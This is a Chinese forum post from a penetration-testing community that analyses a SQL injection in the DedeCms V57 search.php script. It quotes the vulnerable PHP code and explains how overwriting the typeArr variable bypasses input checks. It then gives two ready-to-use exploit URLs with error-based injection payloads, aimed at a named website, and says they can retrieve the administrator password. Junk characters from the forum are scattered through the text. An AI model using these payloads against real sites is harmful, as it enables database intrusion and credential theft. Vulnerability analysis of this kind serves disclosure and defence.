中国网络渗透测试联盟
标题:
DedeCms V57 plus/search.php文件SQL注射
[打印本页]
作者:
admin
时间:
2013-1-19 08:18
标题:
DedeCms V57 plus/search.php文件SQL注射
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
/ F8 y. s. N7 l+ Y# `, r9 v$ {% ~
作者:
c4rp3nt3r@0x50sec.org
- J; G! b, u: X' ^7 M) s
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
( s& }8 A% o- n8 |& X+ l
' J# S; b9 t( M+ ^2 x& A+ y- ?
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
) J9 [+ L ^5 L; e/ r- X% Y
; t" z/ h* L1 E) a) q
============
! u6 c; p* i6 d( X& W& ~
1 n" ^9 @' c9 |
5 Y7 T/ _2 W4 ^% |1 l$ }- I
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
5 T- }6 Q' m" n% X. t5 q
, {/ T# u' l! L' H% ^/ ~% i' P2 x. o
require_once(dirname(__FILE__).”/../include/common.inc.php”);
! B6 [+ _6 J8 [, V: a
require_once(DEDEINC.”/arc.searchview.class.php”);
4 L B: I. b! S# _% z. s/ Z
6 o. J$ A) K9 h6 {2 w: G: K
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
! j" d Z$ q, Q) {+ x9 |, A3 ]
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
& z4 M3 H, j% J- }5 Y; z$ r$ U
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
: ]% U1 C) E3 G: Q, P
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
" c; |! T+ _6 Y' s8 |1 m$ t$ V0 u5 o
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
1 x' s2 ?' P; P" ~
0 E. U0 y# x6 Z) |
if(!isset($orderby)) $orderby=”;
) o' v" \/ i3 J- ]& r
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
6 O7 g1 a* X& p9 D
0 f. g* `/ ]* D; D' o3 A
" ?4 R7 M: e$ h
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
& j# h6 ]9 @% [+ j
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
+ F' F) G- ^; e% ?
* a4 o" l" z" B+ D% k
if(!isset($keyword)){
3 n: x2 o+ L7 ^: A
if(!isset($q)) $q = ”;
& {& _+ H' K; c& }
$keyword=$q;
+ {! e+ t) L9 ~% [4 U1 |
}
: [5 S9 [( r' ]8 h: y
/ ]3 ~' W" S* X3 A7 e
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
5 Y/ Z0 k0 V; `/ ?3 c
% O) n3 p1 A5 m J/ a$ b
//查找栏目信息
4 g& y0 ^$ Y* v# \+ p: k, B
if(empty($typeid))
2 L. t, x' k& d
{
/ d1 [+ m# D3 p% q2 d
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
0 o }# m/ I( K e* _
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
7 @3 I3 V& } @6 P2 q1 Q* S
{
/ r9 J( U& j& X8 Z5 y
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
( [/ i# v6 m" d" P- w# z6 y
fwrite($fp, “<”.”?php\r\n”);
- M6 `, ^+ w6 r5 u& l0 ]# ^6 x
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
7 K. z# U; c& P9 \5 M
$dsql->Execute();
) F7 u3 @4 H+ K. S
while($row = $dsql->GetArray())
: W$ {# T. M4 j* N+ v
{
" u6 B( ^+ F0 d i
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
! E, y7 J8 ~* h- ~0 ^8 t+ G/ H5 O2 i
}
, Z, U, L( C# ?: T# g0 c
fwrite($fp, ‘?’.'>’);
8 M- p! ] @, M' n2 A5 a
fclose($fp);
1 |4 [5 O" |4 f' w0 C
}
1 G9 P5 X0 H+ P. |9 {
//引入栏目缓存并看关键字是否有相关栏目内容
: h: f+ x* _0 |2 z
require_once($typenameCacheFile);
' N# k' b% d/ O9 E9 R' v
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
9 F+ \2 `( e/ ~
//
/ p' X2 r, k/ _. `3 i
if(isset($typeArr) && is_array($typeArr))
/ u; G, K, V, c }, {* I5 P1 X' [$ O
{
! G; \+ q3 M+ k) W. I- x9 T, q
foreach($typeArr as $id=>$typename)
; S0 `7 G* ?: y
{
t2 L! `# W# W! E; z1 J0 j% J3 o
' i- w2 J5 B \- G5 @/ S {
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
8 N# c* O7 u( y: y' c! D, w% W
if($keyword != $keywordn)
1 J4 O; v" `3 k8 l+ N/ t" |
{
. u$ S; F) {* s. q1 T, m3 M3 l( R
$keyword = $keywordn;
7 }: K0 `+ R8 h4 N) e/ Y
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
% o0 n2 [# q3 f4 N
break;
; y4 P" t7 c E7 n0 s! t5 _6 l
}
$ t# n) q$ y% G" |" u- p
}
' n" W4 K' \8 A
}
/ F; f7 z$ U$ r. [% h% U" {' r
}
! q9 M# g2 u. _0 u7 ]5 b y( {
然后plus/search.php文件下面定义了一个 Search类的对象 .
+ `2 E. V) X, |- d
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
0 V' s& D0 K) J, H* z
$this->TypeLink = new TypeLink($typeid);
; ^1 \8 {/ ~5 Q5 d+ Q0 u; W/ O
5 `+ o; B4 P9 t3 C
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
b8 k3 o$ c( L7 f, l
: m9 v& Y B4 T
class TypeLink
. |! o. I$ b9 u. y: Y* T* h# v
{
2 ^+ d. O# ~6 F9 ]: r R
var $typeDir;
8 Z% Y! K( s5 ]! P
var $dsql;
) |7 a7 i# e8 A$ n m
var $TypeID;
0 ?, s9 e5 q) u- Q: M/ t: }
var $baseDir;
o/ N' x: Z2 g5 c$ i) ]
var $modDir;
) G5 b" {" A" G) Q( F$ i
var $indexUrl;
# e4 |* S5 ~0 g% C, y& r, U
var $indexName;
# w+ L% r9 m, u6 l
var $TypeInfos;
! x' ~8 d" y0 g' K
var $SplitSymbol;
s+ d$ m" h4 Z
var $valuePosition;
: g, B ]% Q4 p
var $valuePositionName;
% G } i2 \6 b
var $OptionArrayList;//构造函数///////
" F) L1 _0 e/ l2 {# u# y! ]' j' G
//php5构造函数
/ i) E0 C3 C- J: X
function __construct($typeid)
0 H% V$ \' }$ Q6 D0 i
{
3 u, G7 }' m; i4 N7 I
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
. x# ?: D. z/ [7 ]0 m5 a! Q
$this->indexName = $GLOBALS['cfg_indexname'];
, J6 K- h3 ?8 y- Q
$this->baseDir = $GLOBALS['cfg_basedir'];
! E4 e/ |* n9 X2 |
$this->modDir = $GLOBALS['cfg_templets_dir'];
0 E: v. g5 O8 L) r0 w" g3 L# Q
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
! Z8 Z8 ^# a! ~; m
$this->dsql = $GLOBALS['dsql'];
5 R5 B7 d% p: R; H+ [3 s
$this->TypeID = $typeid;
2 ~# G$ ~7 W& r8 c8 g: s5 B
$this->valuePosition = ”;
% L9 W3 i/ B8 w1 r9 ?) }+ G4 K
$this->valuePositionName = ”;
4 j' P8 u+ R; P5 T( f p6 ~
$this->typeDir = ”;
8 A5 y9 O. f2 ~+ }0 S) }' t- ~
$this->OptionArrayList = ”;
; a3 a3 X* t K
$ b$ n% P0 a0 u" _' R! U' x7 E5 M: \% `
//载入类目信息
" p p8 i0 G- Y9 M
& e0 t: @( L( \& o \- S4 [4 k
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
2 w% P( f* \. p( x0 t
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
2 P% \' b& i/ }- e
`#@__channeltype` ch
2 e* ^ z* D& w2 F* m/ J
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
( U6 a0 G! I4 h% a5 q+ b
9 W! ^2 J; A7 D. u6 C6 W
if($typeid > 0)
, Y3 R, _+ V c; L- k; w2 @
{
; l- m+ l. Z F* m' O9 A! p- u; [
$this->TypeInfos = $this->dsql->GetOne($query);
$ ], U3 S. m7 C {' z3 S( C3 x
利用代码一 需要 即使magic_quotes_gpc = Off
1 J& E7 A/ Z% H9 `4 @2 D9 ?" \+ G
( \% H( |5 H" G+ o, p
www.political-security.com
/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
, b- }1 c) _5 Y* R7 }& m
, W, H7 c" P5 A* s# T/ V
这只是其中一个利用代码… Search 类的构造函数再往下
3 P8 ]. V/ \; k* |2 m' F) p' M6 K- I
5 y1 Y! a; f2 J
……省略
# D M; L- @. Z$ L1 ?, d( j# x9 e
$this->TypeID = $typeid;
! |. Y/ T3 u: D+ c4 {
……省略
0 Y' I5 V6 v. o9 P2 a& V- Q
if($this->TypeID==”0″){
' y, S" G+ v0 w4 ~
$this->ChannelTypeid=1;
# @, M( x* N% f- v
}else{
* g$ S0 r: d( ~* N' S( D2 D
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
3 [5 p) g- Y' l; K5 v7 Z) E
//现在不鸡肋了吧亲…
e- U; c; a1 p" ^4 V3 b- M
$this->ChannelTypeid=$row['channeltype'];
- C' M8 n( Q' v, N: o7 w# t
. ^9 Z3 e# W' o; A
}
+ F$ |6 @% _# s/ @; I
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
9 j( X7 G+ @- E( K! r3 `
* B7 ?0 V3 J4 a3 b4 H& c/ ]
www.political-security.com
/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
( g" F6 u& u' R0 m4 B% r
+ `8 u0 K# Z9 s/ D% G1 m" N
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
1 ?0 W3 f5 `! R ]/ X2 `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2